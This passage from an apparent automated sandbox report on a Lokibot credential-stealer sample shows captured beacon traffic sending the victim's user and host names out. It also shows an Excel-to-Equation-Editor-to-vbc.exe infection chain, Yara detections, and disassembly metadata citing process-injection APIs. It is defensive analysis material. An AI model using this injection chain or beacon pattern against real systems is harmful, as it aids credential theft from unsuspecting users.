Dec 21, 2020 08:34:22.994043112 CET	751	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:23.116628885 CET	751	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2520 Parent PID: 584

General

Start time:	08:32:59
Start date:	21/12/2020
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f280000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2320 Parent PID: 584

General

Start time:	08:33:19
Start date:	21/12/2020
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2952 Parent PID: 2320

General

Start time:	08:33:22
Start date:	21/12/2020
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0xe80000
File size:	584704 bytes
MD5 hash:	3EE960D7D595C82B47CE28164AFED056
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp, Author: Joe Security Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2195981464.0000000002377000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp, Author: Joe Security Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 33%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 3040 Parent PID: 2952

General

Start time:	08:33:27
Start date:	21/12/2020
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0xe80000
File size:	584704 bytes
MD5 hash:	3EE960D7D595C82B47CE28164AFED056
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2952 Parent PID: 2320 vbc.exeCOMMON

Executed Functions

Function 045F22E9, Relevance: 10.8, Strings: 8, Instructions: 815COMMON

Download Yara Rule

Strings

V, xrefs: 045F281A
V, xrefs: 045F2FFA
(, xrefs: 045F2BB8
V, xrefs: 045F2446
], xrefs: 045F2CD0
T, xrefs: 045F2A26
7, xrefs: 045F29ED
Y, xrefs: 045F261F

Memory Dump Source

Source File: 00000004.00000002.2197875520.00000000045F0000.00000040.00000001.sdmp, Offset: 045F0000, based on PE: false

Similarity

API ID:
String ID: ($7$T$V$V$V$Y$]
API String ID: 0-346756334
Opcode ID: e0f41e25a24b9e29194239e257c3177c672ad6c6b66bf1d068151d014dc1eca4
Instruction ID: e66f00cf2dea21c56915d06820175ce40313fc766d402c1e9485da95097d002a
Opcode Fuzzy Hash: e0f41e25a24b9e29194239e257c3177c672ad6c6b66bf1d068151d014dc1eca4
Instruction Fuzzy Hash: 057212B094A229CFDB64DF24CC44BEDB7B5BB49300F1095E9D219A7291EB715AC4EF02

Uniqueness

Uniqueness Score: -1.00%

Function 045F230A, Relevance: 10.7, Strings: 8, Instructions: 701COMMON

Download Yara Rule

Strings

V, xrefs: 045F281A
V, xrefs: 045F2FFA
(, xrefs: 045F2BB8
V, xrefs: 045F2446
], xrefs: 045F2CD0
T, xrefs: 045F2A26
7, xrefs: 045F29ED
Y, xrefs: 045F261F

Memory Dump Source

Source File: 00000004.00000002.2197875520.00000000045F0000.00000040.00000001.sdmp, Offset: 045F0000, based on PE: false

Similarity

API ID:
String ID: ($7$T$V$V$V$Y$]
API String ID: 0-346756334
Opcode ID: 2f6788e5d9941a003158ecb2c93e6871ff16060dd7bb4bb05a02128a550c1619
Instruction ID: 504e72f53ff08a9c3de77846af8356b2fd07367481ba267d1be2ba29e84a2a53
Opcode Fuzzy Hash: 2f6788e5d9941a003158ecb2c93e6871ff16060dd7bb4bb05a02128a550c1619
Instruction Fuzzy Hash: E06201B09462298FDB64DF64CC44BECB7B5BB49300F1095E9E21DA7291EB715AC4EF02

Uniqueness

Uniqueness Score: -1.00%

Function 0037801F, Relevance: 3.9, Strings: 3, Instructions: 163COMMON

Download Yara Rule

Strings

ha, xrefs: 00378065
ha, xrefs: 003781C5
a, xrefs: 00378084

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: ha$ha$a
API String ID: 0-1124426200
Opcode ID: 25b47cc42f500e129bbd014ae174ddc705cf74516f048194827eb25bfc917596
Instruction ID: 87eee17378633fa4c5058bac73333fc05aa90d6e1e914741cf13bde0efdf7615
Opcode Fuzzy Hash: 25b47cc42f500e129bbd014ae174ddc705cf74516f048194827eb25bfc917596
Instruction Fuzzy Hash: 5971F574D05208DFDB54CFA5D898AADBBB6FF89301F20842AD81AB7364DB385945CF21

Uniqueness

Uniqueness Score: -1.00%

Function 0037EAC8, Relevance: 3.9, Strings: 3, Instructions: 114COMMON

Download Yara Rule

Strings

R4M, xrefs: 0037EB9A
R4M, xrefs: 0037EB93
nry{, xrefs: 0037EC48

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: R4M$R4M$nry{
API String ID: 0-3038500771
Opcode ID: e4ea18fa569fc88492a1da314b57cec9f38bd2bbe6d6ed645f179b9d94bff5aa
Instruction ID: 3c849552fc44135f8b39e9dadf8c34b8da988284d38fde048523e86e065f67e7
Opcode Fuzzy Hash: e4ea18fa569fc88492a1da314b57cec9f38bd2bbe6d6ed645f179b9d94bff5aa
Instruction Fuzzy Hash: 25415674E09219DFDB14CFA5C9446AEFBF6FB89300F20D86AD41AA7214E7385A04CF60

Uniqueness

Uniqueness Score: -1.00%

Function 045F053C, Relevance: 2.8, Strings: 2, Instructions: 321COMMON

Download Yara Rule

Strings

], xrefs: 045F05AA
Z, xrefs: 045F07FB

Memory Dump Source

Source File: 00000004.00000002.2197875520.00000000045F0000.00000040.00000001.sdmp, Offset: 045F0000, based on PE: false

Similarity

API ID:
String ID: Z$]
API String ID: 0-2052636315
Opcode ID: 7e9afba618c7a0e377b7be5931b051005a88efdada2a11a0f575ca06747a84a3
Instruction ID: 386fc1c3055c2443bd51e4ef293eb898a243745685df4cf5cb83891109b63dde
Opcode Fuzzy Hash: 7e9afba618c7a0e377b7be5931b051005a88efdada2a11a0f575ca06747a84a3
Instruction Fuzzy Hash: EEC14C70D0A218CFEB24CF64DC447EDB7F1BB4A715F0455AAC249A22D2EB341A85EF16

Uniqueness

Uniqueness Score: -1.00%

Function 045F09CE, Relevance: 2.8, Strings: 2, Instructions: 297COMMON

Download Yara Rule

Strings

], xrefs: 045F05AA
Z, xrefs: 045F07FB

Memory Dump Source

Source File: 00000004.00000002.2197875520.00000000045F0000.00000040.00000001.sdmp, Offset: 045F0000, based on PE: false

Similarity

API ID:
String ID: Z$]
API String ID: 0-2052636315
Opcode ID: 7ce896f599491fc6f481c8b0c59331340f9e6a6f0d723b05b75a5b65b0f6977f
Instruction ID: 6f0642451b050f3071ff37234de84f22ffbd461664750496eeacc114efb679ad
Opcode Fuzzy Hash: 7ce896f599491fc6f481c8b0c59331340f9e6a6f0d723b05b75a5b65b0f6977f
Instruction Fuzzy Hash: BAC14A70D0A218CFEB24CF64DC447EDB7B1BB4A715F0455AAC24AA3292DB341A85EF16

Uniqueness

Uniqueness Score: -1.00%

Function 0037E868, Relevance: 2.6, Strings: 2, Instructions: 127COMMON

Download Yara Rule

Strings

[4l1, xrefs: 0037E9A7
:X),, xrefs: 0037E8BC

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: :X),$[4l1
API String ID: 0-1646749481
Opcode ID: b08b975e5a3f3a6fdeaa5b98ea996b49a410099fd96feaa72d8295c891b58504
Instruction ID: 9f88a2987fb7045c8a910880d2136e49a5daa28ecc5716dd3c506e7bb1528ecd
Opcode Fuzzy Hash: b08b975e5a3f3a6fdeaa5b98ea996b49a410099fd96feaa72d8295c891b58504
Instruction Fuzzy Hash: 7151BF75E01208DFDB44DFE9D98469DBBB6FF88300F24846AD819A7364EB389941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 006E4D3A, Relevance: 1.7, Strings: 1, Instructions: 472COMMON

Download Yara Rule

Strings

TVNm, xrefs: 006E4D65

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID: TVNm
API String ID: 0-1357081221
Opcode ID: c63b467be6cd92810ebda4d3803a199987658801dd2ad37158eb3cebc1a2db9a
Instruction ID: b32dfcd04c197efb69bd8daa290a882e9ab605a2c7e604437b8ff5b2c35f6656
Opcode Fuzzy Hash: c63b467be6cd92810ebda4d3803a199987658801dd2ad37158eb3cebc1a2db9a
Instruction Fuzzy Hash: 3C22E374906668CFDB64CF65C854BEDBBB2BF49304F2081A9D50AAB361DB709E85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00370404, Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00379A9D

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 770e8da2ceccd2c2307eebf73c6918f0bab5bd7f332605ff93c928a31655bf96
Instruction ID: 8f61c17ff3e7677dbd084c95fba09ca6c17d572b7a89116186de90d4c9ae1c02
Opcode Fuzzy Hash: 770e8da2ceccd2c2307eebf73c6918f0bab5bd7f332605ff93c928a31655bf96
Instruction Fuzzy Hash: 184166B9D052589FCF10CFAAD884ADEFBB5BB49310F20942AE818B7310D335A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00372198, Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

8HFm, xrefs: 0037225C

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: 8HFm
API String ID: 0-4285670988
Opcode ID: 5b8887144082b84dcea4af41a315a16d5272ead9e2d9d5e894d6e28836fd803a
Instruction ID: 3af90326d7af315a6b0dac643cafad5f8768c687787ee9f7de03e8660cc05ccf
Opcode Fuzzy Hash: 5b8887144082b84dcea4af41a315a16d5272ead9e2d9d5e894d6e28836fd803a
Instruction Fuzzy Hash: 3A312771E006588BDB29CFA6D8447DEBBB2AFC9310F14C0AAD809AB265DB341945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 003730A8, Relevance: .3, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14d297a9b15d4e5e58f64185bd1537171916f2aa3a6eb227964b6295dc666b9d
Instruction ID: 933e8e0a660b1783d78f0255e7356786a3da64d1f4e6874b91848ccc5afd5108
Opcode Fuzzy Hash: 14d297a9b15d4e5e58f64185bd1537171916f2aa3a6eb227964b6295dc666b9d
Instruction Fuzzy Hash: D6D16C74E1520ADFCB15DF96D8808AEFBB6FF88300B60D459C41AA7314D7389A42DF95

Uniqueness

Uniqueness Score: -1.00%

Function 006E7694, Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb24184c14a98ed9345d91dca0be7cb1988ab56ac3937f3cdc48e50fe5536e28
Instruction ID: a8730d1a1855984124bfd4f41d5a471e7b04e3d4ea1180096b2c9e6b1ee7d5e5
Opcode Fuzzy Hash: bb24184c14a98ed9345d91dca0be7cb1988ab56ac3937f3cdc48e50fe5536e28
Instruction Fuzzy Hash: A8A12D78A09248DFCB14CFAAD4809EDBBF6BF59310B249569E405EB356D730DA42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0037A028, Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ab9a1dd1cae3e805deee040da6888cf33c0e79d2bd981beda490b74b9a97e1bb
Instruction ID: 020095b41b43be741c39e7c2d3f08d6fa230233b71534e7b92c01c02a7bb9143
Opcode Fuzzy Hash: ab9a1dd1cae3e805deee040da6888cf33c0e79d2bd981beda490b74b9a97e1bb
Instruction Fuzzy Hash: 7CB18974E14618CFDB25CFA5D88869DBBB6FF89300F20852AD40ABB354DB389941DF25

Uniqueness

Uniqueness Score: -1.00%

Function 0037A345, Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05ee391ec8187f31887b069d64361471f0e3eba0b7717b663849744ef4587c6e
Instruction ID: fc469beff31feec5635822a30e05ff51dda1a5d58c25fd899bae9c688d57a7fc
Opcode Fuzzy Hash: 05ee391ec8187f31887b069d64361471f0e3eba0b7717b663849744ef4587c6e
Instruction Fuzzy Hash: 36916A74E14618CFDB64DFA4E884A9DBBB6FB89300F10852AD40AFB354DB389941DF25

Uniqueness

Uniqueness Score: -1.00%

Function 00370FC0, Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74172d4aace06ff1adddc18cd6ff51987e84e5856c90019585adc2261382febd
Instruction ID: 2029c20e08b8623e3be43e2d264dc16ccdda94e0550eee5d09d7d38c64a55a1e
Opcode Fuzzy Hash: 74172d4aace06ff1adddc18cd6ff51987e84e5856c90019585adc2261382febd
Instruction Fuzzy Hash: 5071A174E012198FDB08CFA9C884AAEBBB2EF89300F24812AD919BB354D7755945CF51

Uniqueness

Uniqueness Score: -1.00%

Function 003704D0, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04b45ecbd88bbb94d3554cf326b8ec6ffec6e71752f1c0b020a06dce9fef2100
Instruction ID: a9d9ce0295a144c60fc934d61787179d1e0c7d98d17ca1ad16848a44b4adbc28
Opcode Fuzzy Hash: 04b45ecbd88bbb94d3554cf326b8ec6ffec6e71752f1c0b020a06dce9fef2100
Instruction Fuzzy Hash: 32311A71E056188FEB59CFABD84469EFBF7AFC9300F14C0BAC508A6265EB341A458F51

Uniqueness

Uniqueness Score: -1.00%

Function 006E3400, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8452ce86ae114144b4e39e7558e94a94e3335c7b8744d018e2d81c1f7c29f3c7
Instruction ID: 89e5a699c5d12b343607c9f1147e34fee6db8a31ef6b77ef6cff927e48701206
Opcode Fuzzy Hash: 8452ce86ae114144b4e39e7558e94a94e3335c7b8744d018e2d81c1f7c29f3c7
Instruction Fuzzy Hash: 7611EA71D066598BEB09CFABC9145DDBBF7AFC9300F14C47A8849A62A5EB740642CF21

Uniqueness

Uniqueness Score: -1.00%

Function 006E3410, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2dd668de7ad3a9a6bca80881c5031bb870a27c8e95fad19cd1331a7be557c1f
Instruction ID: caefa1c29429441e75b4aaa47ea8ac067c34cdc7d975ec02af5dadcd556c4df2
Opcode Fuzzy Hash: e2dd668de7ad3a9a6bca80881c5031bb870a27c8e95fad19cd1331a7be557c1f
Instruction Fuzzy Hash: 5711FB71D016198BEB08CFABC9046DEFBF7AFC8300F14C47A8919A7365EB7416428E60

Uniqueness

Uniqueness Score: -1.00%

Function 006E0A78, Relevance: 20.1, Strings: 16, Instructions: 109COMMON

Download Yara Rule

Strings

48Nm, xrefs: 006E1426
`!Nm, xrefs: 006E173F
PSIl, xrefs: 006E0E0F
tNm, xrefs: 006E1B0F
PSIl, xrefs: 006E0E29
48Nm, xrefs: 006E1362
PSIl, xrefs: 006E0E35
PSIl, xrefs: 006E0E1B
PSIl, xrefs: 006E0B13
tNm, xrefs: 006E1974
48Nm, xrefs: 006E1434
tNm, xrefs: 006E1983
6, xrefs: 006E1D09
tNm, xrefs: 006E180C
PSIl, xrefs: 006E0B21
48Nm, xrefs: 006E1354

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID: 48Nm$48Nm$48Nm$48Nm$6$PSIl$PSIl$PSIl$PSIl$PSIl$PSIl$`!Nm$tNm$tNm$tNm$tNm
API String ID: 0-402466894
Opcode ID: 25cd7ea6045e952866efa035141fcaa7afaa2fd314542398033af14eb464530f
Instruction ID: d9ef652d0a3d24cddb9aefb42669741dd0ec99052cec9e209b70839c52e78bc5
Opcode Fuzzy Hash: 25cd7ea6045e952866efa035141fcaa7afaa2fd314542398033af14eb464530f
Instruction Fuzzy Hash: 3B41F634741345DFE714DBA9DC5576EBBA7BB85300F24863AE9068B391CBB48841CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00370420, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(?), ref: 0037A892

Strings

PF, xrefs: 00370420

Memory Dump Source

Source File: 00000004.00000002.2194510106.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID: DebugOutputString
String ID: PF
API String ID: 1166629820-1265591196
Opcode ID: f7bb7c7ab7b3e039520f801a2fcee84a345063009241e9e12b685411c91b4eff
Instruction ID: 83bf21d0983374bc7853b30b82725417ea63356a7701fd1f1995eddb58aff81e
Opcode Fuzzy Hash: f7bb7c7ab7b3e039520f801a2fcee84a345063009241e9e12b685411c91b4eff
Instruction Fuzzy Hash: FC31BCB4D00608DFCB14CFA9D484ADEFBF5AB49310F24946AE818B7320D734A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 006E0D30, Relevance: 2.6, Strings: 2, Instructions: 82COMMON

Download Yara Rule

Strings

PSIl, xrefs: 006E0E0F
PSIl, xrefs: 006E0E29

Memory Dump Source

Source File: 00000004.00000002.2194712147.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false

Similarity

API ID:
String ID: PSIl$PSIl
API String ID: 0-358519238
Opcode ID: a19484e3ce741c10bde9a83eedccfbf49dc80e8b6525fdb8a6572ca3eb4f39a6
Instruction ID: c5c613c8f35f928050f0347c57636c2a67a84cb46d8ce7aee6fbe72db0d209dc
Opcode Fuzzy Hash: a19484e3ce741c10bde9a83eedccfbf49dc80e8b6525fdb8a6572ca3eb4f39a6
Instruction Fuzzy Hash: B6212834B05394DFE7108BA98C55AAE7BA6EF86300B14457AD106CB3A1DBB08C41C762

Uniqueness

Uniqueness Score: -1.00%

Function 045F3270, Relevance: 1.7, APIs: 1, Instructions: 224processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 045F3454

Memory Dump Source

Source File: 00000004.00000002.2197875520.00000000045F0000.00000040.00000001.sdmp, Offset: 045F0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8174579d4776374b14177822f34bfe7813a0b67fd4b2f728a50be8752126ee65
Instruction ID: e6a3f7a0df4e0c675c092ed6ae7073dc59c421cd594abb85c1ef7795baf8af9c
Opcode Fuzzy Hash: 8174579d4776374b14177822f34bfe7813a0b67fd4b2f728a50be8752126ee65
Instruction Fuzzy Hash: 1381E174C00269CFDF21CFA5D844BDDBBB5BB49304F1095AAE908B7250DB30AA89DF54

Uniqueness

Uniqueness Score: -1.00%

Function 045F3278, Relevance: 1.7, APIs: 1, Instructions: 222processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 045F3454

Memory Dump Source

Source File: 00000004.00000002.2197875520.00000000045F0000.00000040.00000001.sdmp, Offset: 045F0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3f390b7f23b921f977619cbd23a390c9959ddf7dba174b1510b87b20e54c5479
Instruction ID: b14ecd16c1f6aa09877ef54c0c5b13f661b7682239bf4fd34f11cdfc004bb970
Opcode Fuzzy Hash: 3f390b7f23b921f977619cbd23a390c9959ddf7dba174b1510b87b20e54c5479
Instruction Fuzzy Hash: 9181E174C00269CFDF60CFA5D844BDDBBB5BB49304F1095AAE908B7250EB30AA89DF54

Uniqueness

Uniqueness Score: -1.00%

Function 045F38E8, Relevance: 1.6, APIs: 1, Instructions: 115injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 045F39C6

Memory Dump Source

Source File: 00000004.00000002.2197875520.00000000045F0000.00000040.00000001.sdmp, Offset: 045F0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: bcead0ef69e564f898597f970b5eb9369cabf17c52916c8ba70503c2b4ab6c74
Instruction ID: d88096aeb31f93f693ad3465c7c9a996bd8f6e199ba753d4fe927b4ac0152082
Opcode Fuzzy Hash: bcead0ef69e564f898597f970b5eb9369cabf17c52916c8ba70503c2b4ab6c74
Instruction Fuzzy Hash: EE4189B5D002589FDB00CFA9E984ADEFBF1BB49310F24946AE958B7310D334AA45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 045F38F0, Relevance: 1.6, APIs: 1, Instructions: 112injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 045F39C6

Memory Dump Source

Source File: 00000004.00000002.2197875520.00000000045F0000.00000040.00000001.sdmp, Offset: 045F0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4d83d546592b0aa03be43b335b7cb3d4cb2ce077fc6304acc7cc176cf3af6baf
Instruction ID: f86770bff6983722738f2db56933edf79ea1b13f5816fee579d5dd64f28d5f10
Opcode Fuzzy Hash: 4d83d546592b0aa03be43b335b7cb3d4cb2ce077fc6304acc7cc176cf3af6baf
Instruction Fuzzy Hash: 334178B5D002589FDB10CFA9E984ADEFBF1BB49310F24942AE918B7210D334AA45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 045F36B8, Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 045F3775

Memory Dump Source

Source File: 00000004.00000002.2197875520.00000000045F0000.00000040.00000001.sdmp, Offset: 045F0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 23a6db37afc2d48508ba71da0f62151ce216c117c6ac7bb714f0d19240b28c25
Instruction ID: 7a27a41c8fbc599bd67576055440394e1c52330b197201bf8107adaef6f77eea
Opcode Fuzzy Hash: 23a6db37afc2d48508ba71da0f62151ce216c117c6ac7bb714f0d19240b28c25
Instruction Fuzzy Hash: 6F4188B9D042589FCF10CFA9E884ADEFBB5BB09310F24946AE814B7310D335AA45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 045F36C0, Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 045F3775

Memory Dump Source

Source File: 00000004.00000002.2197875520.00000000045F0000.00000040.00000001.sdmp, Offset: 045F0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 6df6c64bb685606324348171d6d3b27c41eccadb6a6312dc506f4c26a0702b2d
Instruction ID: 90e9e60f354905abc52519f470bf4fa1b00b085af70d03509914159578c2f1d6
Opcode Fuzzy Hash: 6df6c64bb685606324348171d6d3b27c41eccadb6a6312dc506f4c26a0702b2d
Instruction Fuzzy Hash: 4E4178B9D042589FCF10CFA9D884ADEFBB5BB09310F24946AE914B7310D335AA45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 045F37D8, Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 045F388D

Memory Dump Source

Source File: 00000004.00000002.2197875520.00000000045F0000.00000040.00000001.sdmp, Offset: 045F0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 58964775cdde0ff5b9438f657ce257d94514c7f5c59699dcbcaf797c383d34ea
Instruction ID: fb5c2761198e14bb73da47b1210c70d729b037f1deb8c442fa54a40e687b1f59
Opcode Fuzzy Hash: 58964775cdde0ff5b9438f657ce257d94514c7f5c59699dcbcaf797c383d34ea
Instruction Fuzzy Hash: 213175B9D042589FDF10CFA9E884ADEFBB1BB19310F24942AE814B7310D335A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 045F37E0, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 045F388D

Memory Dump Source

Source File: 00000004.00000002.2197875520.00000000045F0000.00000040.00000001.sdmp, Offset: 045F0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
